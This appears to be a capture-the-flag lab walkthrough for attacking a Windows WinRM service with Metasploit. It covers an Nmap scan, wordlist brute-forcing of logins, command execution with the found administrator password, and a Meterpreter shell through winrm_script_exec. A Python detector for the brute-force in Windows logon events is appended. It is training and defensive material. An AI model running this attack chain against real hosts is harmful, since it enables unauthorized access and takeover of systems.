Name: WinRM: Exploitation with Metasploit
URL: https://attackdefense.com/challengedetails?cid=2026
Type: Windows Exploitation: Services
Important Note:
This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
Step 1:
Run an Nmap scan against the target IP.
Command:
nmap --top-ports 7000 10.0.0.173
Step 2:
We have discovered that a WinRM server is running on port 5985. By default the WinRM
service uses port 5985 for HTTP. We will run the Metasploit winrm_login module to find
valid users and their passwords.
Commands:
msfconsole -q
use auxiliary/scanner/winrm/winrm_login
set RHOSTS 10.0.0.173
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
exploit
We have found the valid password of the administrator user.
Step 3:
Check which authentication methods the WinRM service supports using an auxiliary module.
This is very important to know before we try to connect to the WinRM service, because we need to
use an authentication method the service accepts while connecting to it. You can find more information
about WinRM authentication at the link below:
https://docs.microsoft.com/en-us/windows/win32/winrm/authentication-for-remote-connections
Commands:
use auxiliary/scanner/winrm/winrm_auth_methods
set RHOSTS 10.0.0.173
exploit
The target supports two authentication types, i.e. Basic and Negotiate.
Step 4:
Execute a command on the target server using the winrm_cmd module.
Commands:
use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS 10.0.0.173
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit
Step 5:
We have successfully executed the command “whoami” on the remote server. Now, we
will use the winrm_script_exec exploit module to get a Meterpreter shell.
Commands:
use exploit/windows/winrm/winrm_script_exec
set RHOSTS 10.0.0.173
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit
We have gained a Meterpreter session.
Step 6:
Find the flag.
Commands:
cd /
dir
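The credential guessing in Step 2 and the eventual valid logon in Step 5 both leave a trail in the target's Windows Security log: each WinRM Basic/Negotiate attempt is a network logon (LogonType 3), failing with Event ID 4625 and succeeding with Event ID 4624. The following detector is an added example for defenders and is not part of the lab walkthrough; the event IDs and logon type are real Windows values, while the simplified record layout, the source IPs and the sample events are constructed for the demonstration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security log records, reduced to the fields a
# WinRM brute-force leaves behind: (time, event_id, logon_type, source_ip, target_user).
# 4625 = failed logon, 4624 = successful logon; LogonType 3 = network logon, which is
# what WinRM Basic/Negotiate authentication over port 5985 produces on the target.
SAMPLE_EVENTS = [
    ("2026-01-10T09:00:01", 4625, 3, "10.0.0.50", "admin"),
    ("2026-01-10T09:00:01", 4625, 3, "10.0.0.50", "administrator"),
    ("2026-01-10T09:00:02", 4625, 3, "10.0.0.50", "guest"),
    ("2026-01-10T09:00:02", 4625, 3, "10.0.0.50", "root"),
    ("2026-01-10T09:00:03", 4625, 3, "10.0.0.50", "test"),
    ("2026-01-10T09:00:03", 4625, 3, "10.0.0.50", "user"),
    ("2026-01-10T09:00:09", 4624, 3, "10.0.0.50", "administrator"),  # a guess finally hit
    ("2026-01-10T08:30:00", 4625, 3, "10.0.0.77", "bob"),            # one typo, not an attack
    ("2026-01-10T08:31:00", 4625, 2, "10.0.0.77", "bob"),            # console logon, ignored
]

def _parse(events):
    return [(datetime.fromisoformat(t), eid, lt, ip, user.lower())
            for t, eid, lt, ip, user in events]

def detect_winrm_spray(events, min_users=5, window=timedelta(minutes=5)):
    """Flag source IPs whose failed network logons (4625, LogonType 3) hit at least
    `min_users` distinct accounts inside a sliding `window`. Returns {ip: set(users)}."""
    failures = defaultdict(list)
    for t, eid, lt, ip, user in _parse(events):
        if eid == 4625 and lt == 3:
            failures[ip].append((t, user))
    flagged = {}
    for ip, attempts in failures.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) >= min_users:
                flagged[ip] = flagged.get(ip, set()) | users
    return flagged

def compromised_after_spray(events, flagged):
    """Accounts with a successful network logon (4624, LogonType 3) from a flagged
    source for a name it sprayed: the 'valid password found' outcome to act on."""
    hits = set()
    for t, eid, lt, ip, user in _parse(events):
        if eid == 4624 and lt == 3 and ip in flagged and user in flagged[ip]:
            hits.add((ip, user))
    return hits

if __name__ == "__main__":
    sprayers = detect_winrm_spray(SAMPLE_EVENTS)
    print("spraying sources:", {ip: sorted(u) for ip, u in sprayers.items()})
    print("accounts to reset and investigate:", compromised_after_spray(SAMPLE_EVENTS, sprayers))
```

On a real host the same two functions can be fed records exported from the Security log; the accounts returned by the second function are the ones whose passwords should be reset, and the flagged source is the one to block at the WinRM listener.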